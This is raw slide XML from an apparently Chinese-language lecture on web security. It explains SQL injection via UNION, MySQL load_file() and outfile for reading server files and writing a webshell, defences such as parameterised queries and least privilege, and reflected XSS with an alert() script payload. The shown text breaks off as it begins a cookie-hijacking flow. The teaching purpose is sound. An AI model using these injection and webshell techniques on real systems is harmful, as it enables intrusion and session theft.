            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询必须后一个查询和前一个查询的字段数相同</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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5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例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示管理员信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108548" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="2349500"/>
            <a:ext cx="8135937" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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57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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数结合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>load_file()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的一个函数，它可以读取服务器本地文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109572" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="665163" y="3573016"/>
            <a:ext cx="7772400" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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5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文件操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>load_file()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以读写文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>infile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语法可以读写文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可直接在服务器端导出一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（又称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马等，可以用来操作和编辑服务器上的文件）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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注入漏洞的防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116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常用的防御方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数化查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将数据和命令分隔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问数据库时，在需要填入数据的地方，使用参数来复制，而不是字符串拼接方式去查询数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即使参数中含有指令，也不会被数据库运行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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6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过滤与转换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果发现常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字，提示用户输入参数非法并且不再进行数据库查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器与数据库安全设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>给访问数据库的应用程序只分配其所需的最低权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>删除不必要的账户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对数据库及时进行升级和打补丁</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软件漏洞防治的相对性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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lgn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序漏洞：不存在一种算法能够检测程序是安全的（图灵机的停机问题）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全策略漏洞：完备的软件安全策略设置很困难</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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跨站脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136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dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>跨站脚本漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>一种在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>XSS攻击要求用户访问一个被攻击者篡改后的链接，用户访问链接时，被植入的攻击脚本被用户浏览器执行，从而达到攻击目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146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劫持用户会话</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插入恶意内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重定向用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用恶意软件劫持用户浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>繁殖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>修改路由器配置信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保存型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167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成因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>链接包含错误参数，触发错误显示页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器使用动态页面向用户显示错误消息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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en-US" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>https://abc-app.com/error.php?message=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sorry%2c+an+error+occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>响应页面包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;p&gt;Sorry, an error occurred.&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195736" y="5150785"/>
            <a:ext cx="4103687" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9822"/>
              <a:gd name="adj2" fmla="val -619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t>替换参数文本为攻击代码</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en-US" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>https://abc-app.com/error.php?message=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的警告框</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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进一步攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198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劫持用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标识用户的会话信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>劫持用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，可伪造用户身份越权访问网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208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流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户登录网站得到一个令牌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
